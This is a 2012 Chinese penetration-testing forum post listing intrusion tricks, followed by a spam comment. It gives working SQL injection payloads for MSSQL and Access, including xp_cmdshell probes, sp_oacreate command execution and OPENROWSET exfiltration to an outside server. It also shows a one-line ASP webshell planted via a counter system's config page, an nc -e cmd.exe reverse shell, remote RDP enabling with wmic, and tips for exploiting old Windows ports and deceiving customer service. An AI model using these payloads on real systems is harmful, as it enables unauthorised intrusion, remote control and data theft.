中国网络渗透测试联盟

标题: 站库分离的方法 [打印本页]

作者: admin    时间: 2012-9-15 14:41
标题: 站库分离的方法
SA点数据库分离技术相关/ u- V" H/ T4 v, M: H7 F" G
+ R1 H: x* O  G7 Q  B

6 M% H. ]' A& s2 f. w- g3 eSA点数据库分离搞法+语句:
7 G& ]" x: d' ~7 {. W4 a1 Z+ V- F( @- d- R! ]) i! p8 u/ t  o
注射点不显错,执行下面三条语句页面都返回正常。& a+ u; _( m/ f4 m* n7 ?# A
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
; I6 J' X6 q6 E" b# D: m7 b. tand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')! Z/ [( P8 W) D# o! d9 q
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')) V7 I, o8 a) Y4 E5 C: r# n
可以列目录,判断系统为2000,web与数据库分离& d; e0 G1 `7 S* |+ f$ |
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。; f- T' ^: y! K( e) q; D
在注射点上执行
. p8 d' A8 N0 @7 S5 pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
8 ]$ K. q  p  }* I5 r页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
6 H; g0 [% Y" \( k: Y还有我用NC监听得其他端口都没有得到IP。
! |, J  ~$ h: Z9 f7 K$ m6 x
- l6 w5 x: S, I" ^  O. d, @通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。9 Z. G! o: A/ E" Q1 j( v. Z
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--& d4 I5 u+ A3 X' G0 j/ o  K. _

6 c. q4 m6 y8 c  R5 `& \;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--; [" z  b# K: y" J, H5 d
5 S7 F" Q. @, g3 K$ ~
现在就猜想是不是数据库是内网而且不能连外网。7 U" v5 p) U' Z- W8 q3 f2 j8 _! P

, n( H% ]: b7 C  i1 A% n1 R3 o6 t* R# L  w0 X/ \. c
access导出txt文本代码" C5 f! O" Y! g* d7 @
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin% u+ A9 c5 ~. K* x1 T' C
1 K$ C8 @) ~5 r+ X8 ?6 w+ M, ~; f8 K
) r) O1 X; Z0 q2 s- T
7 a4 a: Q/ \1 p0 [
自动跳转到指定网站代码头
6 k2 x; y% q, R1 u<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
4 \& y; ?; V$ o7 x* N, K! ^9 V4 x8 C1 s$ |- ?$ O) a- k

7 _) D# P5 g7 x  C入侵java or jsp站点时默认配置文件路径:
2 y) q5 `' p8 {/ x5 Z9 B\web-inf\web.xml7 t/ T9 b4 l* q; r: R% n. f
tomcat下的配置文件位置:
1 e  K. B! g' b0 d3 Z) ?* z\conf\server.xml            (前面加上tomcat路径)
  C& X$ N( _3 i. R\Tomcat 5.0\webapps\root\web-inf\struts-config.xml- j% V2 i) E0 ~# Q$ A4 G. b
( ^! W. |$ q, Q! T! c. J
  A' ~5 k, ?! T8 B4 v6 R7 ]) U
; q$ n! [$ T, N$ p, T. {3 [$ ^
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
0 |& {6 ~4 i' {3 [! s' i-1%23# |' S6 N! g, J( _* I
> + e  O6 ~- M9 P- B
<
! [- ~2 X8 S9 ^. m& u$ ?! b1'+or+'1'='1
/ ^8 A' v% {6 p( X* n# Xid=8%bf' ]. ]4 `, S# t( E, J6 \4 l
, I" E$ N7 I$ W
全新注入点检测试法:5 u0 v# {& [+ D! @  F# k. O2 j8 g
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。7 S" @8 i% a& f. z0 J% p, X. R: ^

: }. h" I5 Y! O3 h; z6 }在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。( X% ~) K7 ~% N

. Q* B& [$ T! c( ^搜索型注入判断方法:: S; h/ q6 j$ I! T6 H1 o+ g
北京%' and '1'='1' and '%'='2 Z- T- Y0 b- g8 c6 }! H0 y) e
北京%' and '1'='2' and '%'='
1 K! V3 v1 V* e7 o; M- }* y
3 f, @5 H# y, }% W- p# K* G) D6 B3 Y9 M- g7 q: G2 n9 ^
COOKIES注入:
6 o/ b4 d: I$ _  j3 Q8 v- l) D2 S1 ~! {) ~! W
javascript:alert(document.cookie="id="+escape("51 and 1=1"));% V* T" I- w, k; s) `% g, j
2 g( Y- g  B7 S8 x
2000专业版查看本地登录用户命令:6 `. O8 z" L$ G4 F4 W- R
net config workstation. x* o3 t  b( {. i* y/ p, z6 b
2 p% ?. l: I- o% L; n

# |0 {, C* f. _  I( }. p- I4 J2003下查看ipsec配置和默认防火墙配置命令:
7 G2 l2 w" A, F# z' b- Lnetsh firewall show config! x8 o3 j% l, Z5 E8 R0 ?
netsh ipsec static show all: X+ d" d& X" \. P, h

7 f) F( b! v5 ~$ ^# x- v不指派指定策略命令:
( U$ \6 L. [. v) |netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)5 @2 L5 |6 r0 ]1 ]+ J
netsh ipsec static show policy all  显示策略名
3 n+ k1 }8 x6 T3 w0 B5 z9 U# q/ [% b

0 O' i3 F7 w% D% B3 t, r; J猜管理员后台小技巧:
: G6 W5 a" E% y$ v8 badmin/left.asp + \: q& T: |+ P8 e8 ^- ?! C
admin/main.asp
1 a0 r+ z8 {+ Q4 ^8 Aadmin/top.asp
8 @* n& J: e7 J( _  A% _* Sadmin/admin.asp % _3 G. C- N; ^+ q+ g( n3 B
会现出菜单导航,然后迅雷下载全部链接
% s/ d& k1 g1 k7 ~# I/ w1 g+ l- o' B* P. A) c* w, X, _

2 ^" ~% ?$ c3 k! G; U. v社会工程学:3 P& [/ i# q/ d6 }. T5 l3 Y
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
3 w3 Q! G; }: |3 Y% d) ^, E然后去骗客服0 Y) ]1 p3 y  k7 Q9 |9 J% x6 s  p

  [9 K2 q5 o3 k$ V0 [  l, o. w
6 x, W+ L7 _( m9 J0 n5 E6 }7 G统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
  M; z- X$ t( ?9 ^. T查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, / A5 P1 u+ h) j  O! y$ G1 `/ t
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
5 S5 R1 m3 B& }- w' c, U
8 l6 G+ `. v' S6 i
% E( m' t* s. r$ V: p6 x; I) W% y  g/ W
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)# D" [7 D" k; o
; S3 r! ]5 ]0 e# _/ M  k% ?
" p. v# x& U- n% a( [

( L. R4 n2 t7 P4 l% d) u2 e( zCMD加密注册表位置
3 @5 X0 f. e, E) R9 u(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor: M+ Q9 P2 J7 E8 j4 B
AutoRun
& Q8 ?7 U% X# v. |3 ^7 w/ g
+ H) [6 c- o: J2 `(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor) V: S. L, `0 K' s5 o. Z. Q( H
AutoRun- X0 v' a1 r1 z2 g& N8 s
: d5 Y5 X" t8 P% ^+ G

% \1 D) F1 G/ w在找注入时搜索Hidden,把他改成test$ R" i: F3 j- N! R
4 g/ G, w+ V1 Q: T# O

# t! k* c; ?* K; k7 h0 Y: f% S% R. E7 M3 v/ z
mstsc /v:IP /console ! H( _2 H4 K  R. b' i
3 e# V0 r4 I$ S) m4 J$ ]" U/ l4 P
; ]1 o; k+ ^6 w9 x
一句话开3389:0 o% v( Q+ {8 j! O4 p; S
7 x8 I9 ^: q% K2 c& g3 E
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
0 X$ R/ Z: W# N. H; Z: Y7 a9 {( n- u开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
3 S9 q1 D- m4 k3 g1 m0 B+ r
9 l7 m2 q7 {, D3 q3 p8 G1 h  n% Q* Z8 X* f# V, e' u) v
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
6 H9 |: U5 z5 I9 L$ v, HInsert into admin(user,pwd) values('test','test')) ]) R/ f' z; O% I6 R" f4 V
3 ~; z' F. K' |5 y( N" q
! U% H, J3 t; U( u1 [
NC反弹
! v* e# H$ b# Z1 `; Q) ]$ s+ W先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   : L$ {, \9 G) i" Q  h3 n1 P9 C  A. `
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
; X6 Z0 I: H9 m+ A* l0 m+ w* T: v. D! k! X% l/ a$ x
0 _/ t/ q! g9 [2 h
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题! I2 E" E6 s, Y+ g6 x

( p* W7 f4 H0 L有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录$ e7 y1 }2 f! p4 T; `5 _5 N1 Y( |
例如:
& y2 `4 `+ R0 x1 a1 N, t- B: \7 g( m0 lsubst k: d:\www\ 用d盘www目录替代k盘( m# V3 B/ C7 j0 H+ P: N! J% i
subst k: /d  解除K盘代替
作者: 匿名    时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2